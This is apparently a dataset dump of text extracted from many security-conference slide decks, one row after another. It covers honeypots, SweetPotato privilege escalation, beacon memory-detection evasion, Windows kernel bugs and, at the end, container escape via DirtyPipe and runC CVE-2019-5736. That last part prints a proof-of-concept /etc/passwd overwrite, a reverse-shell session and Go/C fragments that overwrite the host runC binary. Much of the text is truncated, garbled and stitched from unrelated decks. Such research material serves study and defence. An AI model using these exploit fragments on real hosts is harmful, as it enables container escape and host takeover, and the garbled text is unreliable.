text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
Dan Hubbard
VP Security Research
Perpetual Beta = Live Testing = Trouble
Airline Terminals using Active Script
Start : Middle : End
Wait, the Web has version numbers?
Web Two Dot UH-OH or Exploit 2.0
An introduction to HoneyJax
– Definitions
– Reasons for deploying them
– Types: Passive, Active HoneyJax, Passive Aggre... | pdf |
Buying time - What is your data
worth?
"The power which money gives is that of brute force;
it is the power of the bludgeon and the bayonet."
-- William Cobbett
"When in doubt, use brute force."
-- Ken Thompson
Who am I?
Adam Bregenzer
(adam@bregenzer.net, adam@sli.cc)
●
Member of Kaos Theory and DC404
●
Developer for... | pdf |
1
SweetPotato中EFS提权错误
各位师傅晚上好,今天我在虚拟机中测试SweetPotato,在Win10中是正常运⾏的,但是在Win2016中
⽆法正常运⾏。SeImpersonatePrivilege开启是正常开启的,通过Procmon查看发现没有访问成功?
Windows2016(提权失败):
Windows10(提权成功): | pdf |
Ghost in the Droid
Possessing Android Applications with ParaSpectre
Jeff Dileo (chaosdata)
DEFCON 25
Hi!
I’m Jeff, and I have a problem.
I like to do bad things to worse programming languages.
*audience says*
Hiiiiiiiiiiiiiiiiii Jeff
Outline
• Introduction
• Motivation
• Original Plan
• Android Function Hooking 102
• Para... | pdf |
Android weblogin:
Google's Skeleton Key
Craig Young, Tripwire VERT
# whoami
I research, identify, and disclose vulnerabilities
as a senior researcher in Tripwire VERT.
I enjoy long bike rides, breaking things which
fail to sanitize input, and building furniture
with my wife on the weekend.
DISCLAIMER: I am definitel... | pdf |
我的安全视界观 aerfa
作者:aerfa
发布:微信公众号“我的安全视界观”
日期:2020 年 2 月 29 日
我的安全视界观 aerfa
目 录
1
致读者................ | pdf |
author:pen4uin
time:2021/11/13
别想用我源码:针对源码泄露的反制思路(仅供娱乐)
目录
0x01 起
0x02 承
0x03 转
Maven
Gradle
0x04 合
0x01 起
自从看了@DriverTom师傅写的这篇文章后,
给我带来的感受就是,关于攻防演练的“潜规则”就只剩下
0x02 承
之前在fofa的帮助“捡到”了几套源码
同时,也从github从git clone了很多工具的源码(java)进行review 学习,但是在IDEA初次打开的时候,
相信大家对下面这个弹窗不会陌生
我不知道你们的选择是什么,我之前都是毫不在意地Trust Project,然后使用maven打包运行。
但是... | pdf |
BeaconEye绕过小记
应L.N.大佬的邀请写一下绕过的复现过程。
最近C2开发群内都在讨论关于cs绕过内存检测的话题。
在今天下午首先是看到了这样一个绕过手段:
希望大佬能讲讲原因。
虽然我也不知道啥意思,总之感觉很厉害就去复现了。
刚好最近在整理关于golang调用api的东西
具体golang调用的代码如下
SymInitialize api如果执行成功会返回为true
加入这一段后就还是常规的alloc -> write -> execute加载stageless shellcode.
然后上线了:
Dbghelp = syscall.NewLazyDLL("Dbghelp.dll")
SymInitialize := ... | pdf |
!
1!
WRITING!YOUR!FIRST!EXPLOIT!
LECTURE!NOTES!
!
Robert!Olson!
Lecturer!
Dept.!of!Computing!&!Info!Sciences!
SUNY!at!Fredonia!
olsonr@fredonia.edu!
@nerdprof!
https://github.com/nerdprof/Writing-Your-First-Exploit!
!
!
!
!
!
1. Laboratory!Setup!
a. Virtual)Machines)
i. Windows!VM!
!
!
!
!
A!Windows!virtual!machine!can... | pdf |
Grifter and Metacortex
@grifter801
@metacortex
A TOUR THROUGH THE DARKSIDE OF THE
INTERNET
THESE GUYS
•
Grifter (@grifter801)
•
DEF CON Goon
•
Multiple time DEF CON Speaker
•
DC801 Founder
•
Founder of 801 Labs Hacker Space in SLC
•
Metacortex (@metacortex)
•
DC801 Organizer
•
Founder of the 801 Labs Hacker Space in S... | pdf |
Untrustworthy
Hardware
And How to Fix It
Seeking Hardware
Transparency
PRESENT DAY.
PRESENT TIME ⌷
- ##FPGA, ##crypto and #openRISC on Freenode
- Shorne and Olofk from #openRISC (hardware and
cross-compilation help)
- PropellerGuy (Parallax Propeller open-source
IO interface)
- Maitimo, International Financ... | pdf |
致远OA漏洞分析
hw已经开始2天啦,期间爆出不少漏洞,这也是⼀个不错的学习机会,可以学⼀下⼤佬的挖洞姿势。
看到致远OA出现了漏洞,随笔写下分析⽂章。经典的组合漏洞。其实只要进了后台,还是有⼏个⽅法可以拿到shell的。
本机环境:
Windows 10
Mysql 5.5.37
S1 V1.9.5/Seeyon A8+/V7.0 SP1
⼀.任意账户登陆分析
根据互联⽹上的POC来看。漏洞在 /thirdpartyController.do" 且method为 access .
根据xml配置⽂件确定 thirdpartyController.do 对应类为 com.seeyon.ctp.portal.sso.thirdpar... | pdf |
1
关于Tomcat中的三个Context的理解
Context
ServletContext
ApplicationContext
StandardContext
@yzddmr6
p⽜在知识星球⾥问了⼀个问题:Tomcat中这三个StandardContext、ApplicationContext、
ServletContext都是⼲什么的
skay师傅给出了⾃⼰的理解:https://mp.weixin.qq.com/s/BrbkTiCuX4lNEir3y24lew
这⾥来讲⼀讲我的理解,说的不⼀定对,仅供参考。
context是上下⽂的意思,在java中经常能看到这个东⻄。那么到底是什么意思呢?
根据我的理解,如果把某次请求... | pdf |
2020/10/22
编辑 实战渗透-基于DWR框架下的漏洞探测 - Sooooooooooooooooooo,Skr!~ - Powered by Typecho
https://www.websecuritys.cn/admin/write-post.php?cid=182
1/10
前言
未经授权,禁止转载!
0x01
前段时间,在对某站群系统进行代码审计时,发现某处DWR-AJAX接口存在文件上传漏洞
代码层:
可以清楚的看到这里是一处文件上传漏洞,在进行存储的过程中,未进行任何文件类型效验操作。
由于是dwr框架,可以通过dwr.xml 查看映射关系
public String upload(InputStream is,... | pdf |
Real World Privacy
DEFCON 12
July 30, 2004
Real World Privacy
How to leave fewer breadcrumbs in life
by Roger Cooke
n0namehere@yahoo.com
Real World Privacy
DEFCON 12
July 30, 2004
What are you talking about?
The focus here is not a ‘why’ talk, we’re talking
the how.
If you need to know why, leave your full name,
DOB... | pdf |
l i n u x 内 核 漏 洞 检 测 与 防 御
蒋浩天/张海全 腾讯安全云鼎实验室
自我介绍
蒋浩天:
擅长二进制安全、虚拟化安全、游戏安全等,喜欢研究一些底层方向,将安全能力下沉,开启安
全对抗的上帝模式。
张海全:
主要从事GCC和Linux内核安全功能研发,Linux内核源码贡献者。 主要方向是漏洞挖掘,CFI防
御,编译器sanitizer。致力于将漏洞扼杀在编译器中。
l 漏洞攻防现状
l 漏洞利用技术
l 传统漏洞防御技巧
l 基于intel pt的漏洞检测方案
l 基于编译器的漏洞防御方案
l 后续展望
大纲
漏洞攻防现状
主机漏洞防御价值
•
系统漏洞可通杀,是云主机最主
要威胁。
•
挖矿/勒索等入侵的必争... | pdf |
对⼀些基于chrome的dom-xss插件学习,有 dom-based-xss-finder 和 XssSniper ,看看它们的原理是什么。
mainfest.json
对于chrome来说,mainfest.json包含了整个插件各种配置,在配置⽂件中,可以找到插件⼀些启动的源代码。
⼏个⽐较重要的⼏个字段
browser_action
这个字段主要负责扩展图标点击后的弹出内容,⼀般为popup.html
content_scripts
matches 代表scripts插⼊的时机,默认为document_idle,代表⻚⾯空闲时
js 代表插⼊的scripts⽂件路径
run_at 定义了哪些⻚⾯需要插⼊scripts
per... | pdf |
Protecting Data with Short-
Lived Encryption Keys and
Hardware Root of Trust
Dan Griffin
DefCon 2013
What does the NSA think?
• The NSA has been public about:
– The inevitability of mobile computing
– The need to support cloud-based services
– Even for use with secret data in the field
• General Alexander, head of the... | pdf |
调用栈
lookup:172, JndiManager (org.apache.logging.log4j.core.net)
lookup:56, JndiLookup (org.apache.logging.log4j.core.lookup)
lookup:221, Interpolator (org.apache.logging.log4j.core.lookup)
resolveVariable:1110, StrSubstitutor (org.apache.logging.log4j.core.lookup)
substitute:1033, StrSubstitutor (org.apache.logging.log... | pdf |
Offensive Windows IPC Internals 2: RPC
Contents:
The Series
Introduction
History
RPC Messaging
RPC Protocol Sequence
RPC Interfaces
RPC Binding
Anonymous & Authenticated Bindings
Registration Flags
Security Callbacks
Authenticated Bindings
Well-known vs Dynamic Endpoints
RPC Communication Flow
Sample Implementation
A... | pdf |
© 2012
Presented by:
Pwn’ing you(r) cyber offenders
Piotr Duszynski
@drk1wi
© 2012
;WHOAMI;#?
•
Senior Security Consultant @Trustwave OSCP, OSCE, CEH
•
In security field for the past 6 years, hacking since 9 …
•
Enjoys security research, crazy road trips, mojitos and good music
•
Regardless of this slide ... | pdf |
apt-get install binfmt-support qemu-user-static qemu qemu-system
1.
QEMU
0x00 QEMU
0x01 QEMU
cp $(which qemu-aarch64-static) ./
sudo chroot . ./qemu-aarch64-static ./bin/ls
2.
1.
apt-get install bridge-utils uml-utilities
0x02 QEMU
brctl addbr br0 #br0bridge
brctl addif br0 eth0 #br0eth0
brct... | pdf |
Windows GDI Local Kernel Memory Overwrite
Vulnerability researched and exploit developed by
Joel Eriksson <joel.eriksson@bitsec.com>
About the bug
The Graphics Device Interface, GDI, is part of the Win32-subsystem and is responsible for displaying
graphics on devices such as video displays as well as printers.
Bas... | pdf |
Constructing ELF Metadata
DEFCON 20
July 28, 2012
Rebecca Shapiro and Sergey Bratus
Dartmouth College
Who? What? Where?
Image by Stripey the crab [CC-BY-SA-3.0]
This Talk in One Minute
”Deep magic” before a program can run
ELF segments, loading, relocation,
”Deeper magic” to support dynamic linking
Dynamic sym... | pdf |
Hacking
BLE Bicycle Locks
for Fun
& A Small Profit
1
whoami
• From Sunny Singapore
• Senior Security Consultant @ MWR
• Mobile and Wireless geek
– BlackHat USA 2016 – Bad for Enterprise:
Attacking BYOD Enterprise Mobile Security Solutions
2
Bike-Sharing Economy and the BLE “Smart” Lock
1
Overview
3
Building a Maste... | pdf |
By Paul Wouters
<paul@xtdnet.nl>
_
Theory of DNSSEC
_
Using bind with DNSSEC
_
Securing “.nl” with SECREG
_
Deploying DNSSEC on large scale
Overview presentation
PART ONE: DNSSEC
_
IPsec basics
_
What is Opportunistic Encryption
_
Protecting the net with OE
_
Installing and Configuring OE
_
Securing the wireless: Wave... | pdf |
Controlling the Source:
Abusing Source Code
Management Systems
Brett Hawkins (@h4wkst3r)
Adversary Simulation, IBM X-Force Red
Agenda
2
IBM Security / © 2022 IBM Corporation
•
Introduction
•
Source Code Management Systems
•
GitHub Enterprise
•
GitLab Enterprise
•
Bitbucket
•
SCMKit
•
Demos
•
Defensive Considerations
... | pdf |
针对智能设备漏洞挖掘的
一些新方法
小灰灰
百度安全实验室 高级安全研究员
30-May2019
2
关于我
百度安全实验室 高级安全研究员
研究领域:IoT安全/AI安全/无人车安全
多次破解硬件设备
之前负责:
• BSRC、应急处置、0day分析
• 百度产品 安全评估
• 百度安全监控体系建设
传统IOT设备的破解
路由器?
固件下载
Binwalk解包
找到有问题的bin(why?)
IDA分析、WEB 脚本文件分析
漏洞验证(真机or QEMU测试)
大多数 好像都是漏洞分析
现在?
IOT设备越来越多种多样,
not only 路由器
大厂也不会让你轻易破解
•
固件不提供下载
•
telnet、串口、ADB都关闭
•... | pdf |
1
目录
关于OWASP
“开源Web应用安全项目”(OWASP)是一个开放
的社区,致力于帮助各企业组织开发、购买和维护可信任
的应用程序。
在OWASP ,您可以找到以下免费和开源的信息:
• 应用安全工具和标准;
• 关于应用安全测试、安全代码开发和安全代码审查
方面的完整书籍;
• 演示文稿和视频;
• 关于常见风险的Cheat Sheets;
• 标准的安全控制和安全库;
• 全球各地分会;
• 尖端技术研究;
• 专业的全球会议;
• 邮件列表。
更多信息,请访问: https://www.owasp.org。
更多中文信息,请访问:http://www.owasp.org.cn/。
所有的OWASP工具、文档、论坛和全... | pdf |
World War 3.0
Chaos, Control & The Battle for the Net
DEFCON 20
World War 3.0
Chaos, Control & The Battle for the Net
DEFCON 20
ABSTRACT:
There is a battle under way for control of the Internet. Some see it as a fight
between forces of Order (who want to superimpose existing, pre-digital power
structures and their no... | pdf |
D0 N0 H4RM:
A HEALTHCARE SECURITY
CONVERSATION
D0#No#H4rm#
a#healthcare#security#conversation#
D0 N0 H4RM:
A HEALTHCARE SECURITY
CONVERSATION
D0#No#H4rm#
a#healthcare#security#conversation#
Fireside
Fireside Hax
Moderators
Christian#Dameff,#MD#
UC#San#Diego#
Jeff#Tully,#MD#
UC#Davis#
Josh#Corman#
CSO#PTC#
I... | pdf |
技
术
标
准
研发运营一体化能力成熟度模型
第 3 部分:持续交付过程
The DevOps capability maturity model
Part 3: Continuous delivery process
(征求意见稿)
2017 年 11 月 18 日
YDB XXXXX—XXXX
I
目 次
目次................................................................................... I
前言................................................................. | pdf |
CSRF: Yeah, it still works…
Mike Bailey,
skeptikal.org
Russ McRee,
holisticinfosec.org
DISCLAIMER:
• The views, opinions, and
methodologies discussed here
do not reflect those of our
employers, thus no smack talk
herein is to be attributed to
anyone other than Mike and
Russ.
The XSS Epidemic: Discovery, disclos... | pdf |
/por/login_auth.csp?apiversion=1
HTTP/1.1 200 OK
Date: Thu, 01 Apr 2021 01:11:26 GMT
Server: Server
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 2434
X-Robots-Tag: noindex, nofollow, noarchive, nosnippet, nosnippet, notranslate, noimageindex
Con... | pdf |
LAN PROTOCOL ATTACKS
PART 1 -
ARP RELOADED
Presented at Defcon 15
Las Vegas, NV 2007
Jesse ‘x30n’ D’Aguanno
jesse[at]praetoriang.net / x30n[at]digrev.org
Defcon 15
Las Vegas, NV August 2007
Jesse D’Aguanno
(c) Copyright 2007 Praetorian Global, LLC
Background
•
$whoami
–
Jesse ‘x30n’ D’Aguanno
–
Director of Profession... | pdf |
CREATING THE DEFCON CHINA 1.0 BADGE
joe Grand aka kingpin
introduction / badge history
• bring community together through interactivity
• create game to encompass the defcon experience
• simple design that could be expanded during/after defcon
• interactive, command-based menu for additional exploration
goals
• comp... | pdf |
Pinworm
Man in the middle for metadata
@bigezy_(bigezy)
@itsasstime (saci)
[need to add Introduction section]
My previous related
• Badger: Blackhat 2014
https://www.blackhat.com/docs/us-
14/materials/us-14-Rogers-Badger-The-
Networked-Security-State-Estimation-
Toolkit.pdf
• Kobra: BsidesLV 2015
https://youtu.be/gOM... | pdf |
1
Extracting the painful (blue)tooth
Matteo Beccaro
•
Security Consultant at Secure Network
•
Technical Research Leader at Opposing Force, Physical
Security division of Secure Network
•
@_bughardy_
{
Matteo Collura
•
Student at Politecnico di Torino (www.polito.it)
•
Electronic Engineer
•
Researcher in several fields
... | pdf |
Wireless Aerial
Surveillance Platform
W.A.S.P.
DEFCON 19
Who we are.
Project Inception -
October 2009
• “Dude, I have an idea…”
• Build a UAV
• Provide remote penetration testing capabilities
• Useable flight time (~1 hour)
• Man portable
• Design Philosophy
• Low cost
• Utilize open source and off-the-s... | pdf |
BRAIN GAMES
Make your own Biofeedback Video Game
Ne0nRa1n
That Strange Little 'Brain Girl'
Joe Grand aka Kingpin
www.kingpinempire.com
What is old is new again!
Interest in the human brain has been around for a very
long time. The first known writing on the brain is found in
ancient Sumerian records from 4000 B.C, wh... | pdf |
Spring Part 2 SpringMVC
审了⼀些Spring的项⽬,还是打算以开发的⻆度从头看⼀下,Spring第⼀部分之前发过⼀遍,这
次打做⼀个补全。跟着B站的视频看的,迷迷糊糊视频快进看了⼀个⼩时,感觉东⻄也不多.....其
实直接上代码看别⼈怎么写的更有效率⼀点233333333
Part3 感觉看下源码分析⽐较好,额,好像springboot也要简单过下,虽然审过了,但是查漏补
缺嘛~
《Spring Part 1 四天学习总结》
https://mp.weixin.qq.com/s/Qqu11XiZkWchhQ15y0J0_A
⼀、SpringMVC 的基本概念
1. 三层架构
表现层、业务层、持久层
2.MV... | pdf |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
... | pdf |
1
软件安全漏洞挖掘
技术探讨
文伟平 博士
北京大学软件与微电子学院
小组主页:www.pku-exploit.com
联 系 Q Q:513357938
漏洞挖掘技术难点
漏洞挖掘本身的难度
函数模型(Windows 7之前系统)
逻辑模型
安全开发平台
云计算
虚拟化
系统安全对抗
Windows 7,8系统安全防护机制
IE 的Use after Free
GS,SafeSEH,DEP和ASLR
ROP,Heap Spray,JIT Spray
SharedUserData
小组主页:www.pku-exploit.com
联 系 Q Q:51335793... | pdf |
digita security
The Mouse
is mightier than the sword
WHOIS
cybersecurity solutions for the macOS enterprise
@patrickwardle
synack
digita
nsa
nasa
Outline
the targets
(past) attacks
mitigations
full bypass
weaponization
digita security
THE TARGETS
'tempting' UI components
The Attacker's Conundrum
keychain
kexts
key... | pdf |
Nathan Seidle
SparkFun Electronics
Combos in 45
minutes or less!*
*You know what these mean…
2002
Animation:
How combination safe works
Power!
Motor with 8400
tick encoder
Servo with
feedback
Arduino
Handle puller
Magnets
Erector set
(Actobotics)
The super freaking amazing
nautilus gear that made this all
work
‘... | pdf |
1
The Tor Project
Our mission is to be the global resource for
technology, advocacy, research and
education in the ongoing pursuit of freedom
of speech, privacy rights online, and
censorship circumvention.
2
● Online Anonymity
– Open Source
– Open Network
● Community of
researchers,
developers, users and
relay ... | pdf |
某C2鸡肋漏洞分析
2022-05-12 · 基础设施
CobaltStrike是一个知名的红队命令与控制框架,采用 Beacon <-> TeamServer <-> Client 架构。TeamServer
存在受限路径穿越写文件与反序列化漏洞,可以被认证后客户端恶意利用。Client存在反序列化漏洞,可以被
RogueCS攻击。
Author: hosch3n@逐日实验室
山寨威胁建模
由于这个软件的特殊性,我们需要想想什么才是漏洞:
1. 直接攻击TeamServer暴露的服务
2. 通过Beacon攻击TeamServer
3. 通过Client攻击TeamServer
4. 通过TeamServer攻击Client
Te... | pdf |
Hacking UFOlogy: Thirty Years in the Hall of Mirrors
notes for a presentation by Richard Thieme
Def Con 15 – August 2007
These are notes – meant to be supportive of the one hour presentation made
at Def Con 15 and suggestive of further avenues of inquiry. Consult the
select bibliography at the end for further read... | pdf |
企业应用层面临的IT安全风险与危机
何迪生
Dixon Ho
OWASP AppSec Asia 2016
今天分享的内容 What we will share today !!!
• 安全领域的未来
What Security Domain will look Like in the Future
• 当前面临的最大挑战
Review of today’s Security Challenge
• 下一步应该做什么?
What should we do immediately/next step?
安全领域未来的世界是什么样….
Let‘s discuss about what the Security Domain will l... | pdf |
1
CVE-OLOO-OOXVQ扩展
中午看了下这篇⽂章https://mp.weixin.qq.com/s/S15erJhHQ4WCVfF0XxDYMg,发现了点问题,记
录下
选⽤RequestMapping内存⻢,demo如下
2
测试的时候发现注⼊可以成功,但⽆法访问executeCommand⽅法,查看报错堆栈,提示参数错误,没
有指定executeCommand需要的String参数,但实际有传。
Java
复制代码
public class SpringRequestMappingMemshell {
public static String doInject(Object requestMappingHa... | pdf |
Web2Own
ATTACKING DESKTOP APPS FROM
WEB SECURITY'S PERSPECTIVE
Who are we
• 9aX.TgUh
• LYbWYbhKYWifhmPiUbkiEUV
• FYaVYf cZ)cdg<L?LYUa
• KdYU_Yf cZ RYfcG\hg+)*1UbX ABL;+)*1=iVU
Who are we
• 9AYUfaYb*
• KYWifhmJYgYUfW\YfbLYbWYbhKYWifhmPiUbkiEUV
• KdYU_YfcZ:gUKYWOYgh +)*1
Who are we
• 9L)a-hcT
• KYWifhmJYgYUfW\YfbLYbWYbhK... | pdf |
SELECT code_execution FROM * USING SQLite;
-- gaining code execution using a malicious SQLite database
Omer Gull
Check Point Research
whoami
•
Omer Gull
•
Vulnerability Researcher
•
Check Point Research for the past 3 years
•
Now at Hunters.AI
Agenda
•
Motivation and back story
•
SQLite3 Intro
•
Examining the att... | pdf |
CTF For Beginner
bananaapple
$whoami?
• bananaapple
• 交通大學資工系大四
• 從開始學習資安到現在約一年
• 專長 : Binary exploit
• 目前為 Bamboofox 中的一員
• 曾經參與的比賽
• CTCTF ( 台交駭客搶旗賽 )
• Bosten key party CTF 2015
• DEF CON CTF Qualifier 2015
• HoneyMe CTF
• ……
故事的開始
DESCRIPTION
這是專在講 "程式不安全" 的課程,也建立一個
wargame.cs.nctu.edu.tw 的專屬網站。這門課最早在96年開設,中
間斷了幾年,... | pdf |
VirGraf101:
An Introduction to Virtual Graffiti
Tottenkoph
What is virtual graffiti?
• Virtual objects and/or digital messages,
images, animations, etc.
• Applied to or viewable from public locations
• Can be viewed through:
– Computers
– Mobile devices
– Billboards
– Signs
– Side of buildings
What we’re covering
• H... | pdf |
Disclaimer: This presentation is based upon personal research that was not supported
or authorized by my employer. The material being presented may be considered offensive to
those with weak hearts, a sense of ethics, or those highly invested in technology funds.
Robert Stucke
bobx@rot26.net
DNS Has Been Found
To Be Ha... | pdf |
Compelled Decryption
State of the Art Doctrinal Perversions
by Ladar Levison
Owner and Operator, Lavabit LLC
Version 1.0
July 8th 2016
DEF CON 24 PRESENTATION PREVIEW
PLEASE NOTE
THESE SLIDES ARE PRELIMINARY
EXPECT ALTERATIONS
First Party
vs
Third Party
Communications Assistance
for Law Enforcement Act
(aka CALEA)
Th... | pdf |
[译] 渗透测试实战第三版(红队版)
译者:Snowming(雪茗) 时间:北京时间 2019-03-17
本书英文名:The Hacker Playbook 3
阅读
在 Github 上阅读本书
免责声明
@Snowming 纯粹出于学习目的与个人兴趣翻译本书。本人承诺绝不用此译文谋取任何形式的经济利益。也坚决拒绝
其他任何人以此牟利。
本译文只供学习研究参考之用,不得用于商业用途。@Snowming 保留对此版本译文的署名权及其它相关权利。
若有人使用本译文进行侵权行为或者违反知识产权保护法的任何行为,与本译者无关。译者坚决反对此类行为。
任何转载必须注明出处。
译者的话
这本书是 The Hacker Playbook 的... | pdf |
Game of Drones
PUTTING THE EMERGING ‘DRONE DEFENSE’ MARKET TO THE TEST
DEF CON 25 (2017) – LAS VEGAS, NV
July 29, 2016
Presented by:
•
Francis ‘tastic’ Brown
•
David Latimer
Bishop Fox, LLC
www.bishopfox.com
2
1. The Danger Drone by Bishop Fox
2. Crazy State of Drone Defense Market
3. Drone Legal Landscape... | pdf |
Truman Kain
TEVORA
Your Lookout on Autopilot
Surveillance Detection
TL;DR
Autopilot cameras are good
for a lot more than driving.
So are Teslas.
Why Tesla?
•Three Cameras Built In*
•Detailed Vehicle/Owner API
•Sentry Mode (Always On)
•In-Car Web Browser
Surveillance Detection Scout
•Real-Time License Plate Recogn... | pdf |
ERROR: type should be string, got "https://www.comp.nus.edu.sg/programmes/pg/misc/\nØ\nGitHub:brant-ruan\nØ\nBlog:blog.wohin.me\nØ\n5G\nØ 盟\nØ \nØ\nMetarget\nAboutMe\nCONTENTS\n01\n02\n04\nDirtyPipe\nCVE-2019-5736\n03\n05\nrunC\nsrc: https://containerd.io/img/architecture.png\n故事要从DirtyPipe讲起\n01\nDirtyPipe (CVE-2022-0847)\nTheDirtyPipeVulnerability\nMaxKellermann max.kellermann@ionos.com\nAbstract\nThisisthestoryofCVE-2022-0847,avulnerabilityintheLinuxkernel\nsince5.8whichallowsoverwritingdatainarbitraryread-onlyfiles.\nThisleadstoprivilegeescalationbecauseunprivilegedprocessescan\ninjectcodeintorootprocesses.\nItissimilarto CVE-2016-5195DirtyCow butiseasiertoexploit.\nThevulnerability wasfixed inLinux5.16.11,5.15.25and5.10.102.\n➜ dpuname-r\n5.8.0-050800rc1-generic\n➜ dpcat/etc/passwd|head-n1\nroot:x:0:0:root:/root:/usr/bin/zsh\n➜ dp./exploit/etc/passwd1hacked\nItworked!\n➜ dpcat/etc/passwd|head-n1\nrhacked0:0:root:/root:/usr/bin/zsh\nPoC/etc/passwd\n➜ ~dockerrundirtypipe:exp-1\n[*]exploitingDirtyPipe (CVE-2022-0847)\n[+]runC openedforreadingas/proc/self/fd/3\n[+]gotentrypoint:0x232390\n[*]injectingpayloadintorunC atentrypoint 0x232390\n[+]done\nshell\n➜ ~ncat -klvnp 4444\nNcat:Version7.60(https://nmap.org/ncat )\nNcat:Generatingatemporary1024-bitRSAkey.\nNcat:Listeningon:::4444\nNcat:Listeningon0.0.0.0:4444\nNcat:Connectionfrom192.168.3.101.\nNcat:Connectionfrom192.168.3.101:51995.\nexit\nNcat:Connectionfrom192.168.3.101.\nNcat:Connectionfrom192.168.3.101:51998.\npython3-c\"importpty;pty.spawn('/bin/bash')\"\n<08da5d2c57febb811f43f7ddf67a647d38c8e370d914ef6af#\n<08da5d2c57febb811f43f7ddf67a647d38c8e370d914ef6af#cd/\ncd/\nroot@ubuntu-bionic:/#\nØ runC\nØ CVE-2019-5736\nØ runC...\nØ runC\nØ runC\nØ \n名噪一时的CVE-2019-5736\n02\nCVE-2019-5736\n1\n终端2\nshell1%runc runctr\nshell2%runc execctrsh\n[thiswillblockfor500seconds]#sleep 500\nshell1[ctr]#ps aux\nPIDUSERTIMECOMMAND\n1root0:00sh\n18 root0:00{runc:[2:INIT]}/proc/self/exeinit\n24root0:00ps aux\nshell1[ctr]#ls/proc/18/fd -la\ntotal0\ndr-x------ 2rootroot0Nov2814:29.\ndr-xr-xr-x9rootroot0Nov2814:29..\n...\nlr-x------ 1rootroot64Nov2814:294->/run/runc/test\n...\nshell1[ctr]#ls-la/proc/18/fd/4/../../..\ntotal0\n...\ndrwxr-xr-x1rootroot1872Nov2509:22bin\ndrwxr-xr-x1rootroot552Nov2509:46boot\ndrwxr-xr-x21rootroot4240Nov2722:09dev\ndrwxr-xr-x1rootroot4958Nov2814:28etc\ndrwxr-xr-x1rootroot12Jun1512:20home\ndrwxr-xr-x1rootroot1572Oct3012:00lib\nCVE-2016-9962\nSetinit processesasnon-dumpable\nWhoC\nnsenter:clone/proc/self/exetoavoidexposinghostbinarytocontainer\nTherearequiteafewcircumstanceswhere/proc/self/exepointingtoa\nprettyimportantcontainerbinaryisa_bad_thing,sotoavoidthiswe\nhavetomakeacopy(preferablydoingself-clean-upandnotbeing\nwriteable).\nWerequirememfd_create(2)-- thoughthereisanO_TMPFILEfallback--\nbutwecanalwaysextendthistouseascratchMNT_DETACHoverlayfs or\ntmpfs.Themaindownsidetothisapproachisnopage-cachesharingfor\ntherunc binary(whichoverlayfs wouldgiveus)butthisisfarless\ncomplicated.\nThisisonlydoneduringnsenter sothatithappenstransparentlytothe\nGocode,andanylibcontainer usersbenefitfromit.Thisalsomakes\nExtraFiles and--preserve-fds handlingtrivial(becausewedon'tneedto\nworryaboutit).\nFixes:CVE-2019-5736\nCo-developed-by:ChristianBrauner <christian.brauner@ubuntu.com>\nSigned-off-by:Aleksa Saraiasarai@suse.de\nnsenter:cloned_binary:trytoro-bind/proc/self/exebeforecopying\nTheusageofmemfd_create(2)andothercopyingtechniquesisquite\nwasteful,despiteattemptstominimise itwith_LIBCONTAINER_STATEDIR.\nmemfd_create(2)added~10Mofmemoryusagetothecgroup associatedwith\nthecontainer,whichcanresultinsomesetupsgettingOOM'd (orjust\nhoggingthehosts'memorywhenyouhavelotsofcreated-but-not-started\ncontainersstickingaround).\nTheeasiestwayofsolvingthisisbycreatingaread-onlybind-mountof\nthebinary,openingthatread-onlybindmount,andthenumounting itto\nensurethatthehostwon'taccidentallybere-mountedread-write.This\navoidsallcopyingandcleansupnaturallyliketheothertechniques\nused.Unfortunately,liketheO_TMPFILEfallback,thisrequiresbeing\nabletocreateafileinside_LIBCONTAINER_STATEDIR(sincebind-mounting\noverthemostobviouspath-- /proc/self/exe-- isa*verybadidea*).\nUnfortunatelydetectingthisisn'tfool-proof-- onasystemwitha\nread-onlyrootfilesystem(thatmightbecomeread-writeduring\"runc\ninit\"execution),wecannottellwhetherwehavealreadydoneanro\nremount.Asapartialmitigation,westorea_LIBCONTAINER_CLONED_BINARY\nenvironmentvariablewhichischecked*alongside*theprotectionbeing\npresent.\nSigned-off-by:Aleksa Saraiasarai@suse.de\n2019-03-01 v1.0.0-rc7\n2019-02-08 v1.0.0-rc7\nLXCmemfd\nCVE-2019-5736(runC):rexec callersasmemfd\nAdamIwaniuk andBorys Popławski discoveredthatanattackercancompromisethe\nrunC hostbinaryfrominsideaprivilegedrunC container.Asaresult,this\ncouldbeexploitedtogainrootaccessonthehost.runC isusedasthedefault\nruntimeforcontainerswithDocker,containerd,Podman,andCRI-O.\n➜ lxc git:(master)tail-n14./src/lxc/rexec.c\n/**\n*Thisfunctionwillcopyanybinarythatcallsliblxc intoamemoryfileand\n*willusethememfd torexecute thebinary.Thisisdonetopreventattacks\n*throughthe/proc/self/exesymlink tocorruptthehostbinarywhenhostand\n*containerareinthesameusernamespaceorhavesetupanidentityid\n*mapping:CVE-2019-5736.\n*/\n__attribute__((constructor))staticvoidliblxc_rexec(void)\n{\nif(getenv(\"LXC_MEMFD_REXEC\")&&lxc_rexec(\"liblxc\")){\nfprintf(stderr,\"Failedtore-executeliblxc viamemoryfiledescriptor\\n\");\n_exit(EXIT_FAILURE);\n}\n}\nØ runC\nØ runCro mount\nØ runC =>\nØ memfd\nØ ro mount\nØ 呢\n常见利用场景与利用手法\n03\n前提:runC是动态链接的\nvarpayload=\"#!/bin/bash\\n\"+shellCmd\nfor{\nwriteHandle,_:=os.OpenFile(\"/proc/self/fd/\"+strconv.Itoa(handleFd),os.O_WRONLY|os.O_TRUNC,0700)\nifint(writeHandle.Fd())>0{\nwriteHandle.Write([]byte(payload))\n//msfvenom -ax86-plinux/x86/execCMD=\"id>/tmp/hacked&&hostname>>/tmp/hacked\"-felf\nconstunsignedcharmalicious_elf_bytes[]={\n/*0x7f,*/0x45,0x4c,0x46,0x01,0x01,0x01,0x00,0x00,0x00,0x00,0x00,\n/*ELF */\n};\nintmain(intargc,char**argv){\nif(write_with_dirtypipe(path,1,malicious_elf_bytes,malicious_elf_bytes_size)!=0){\nrunc_fd_read 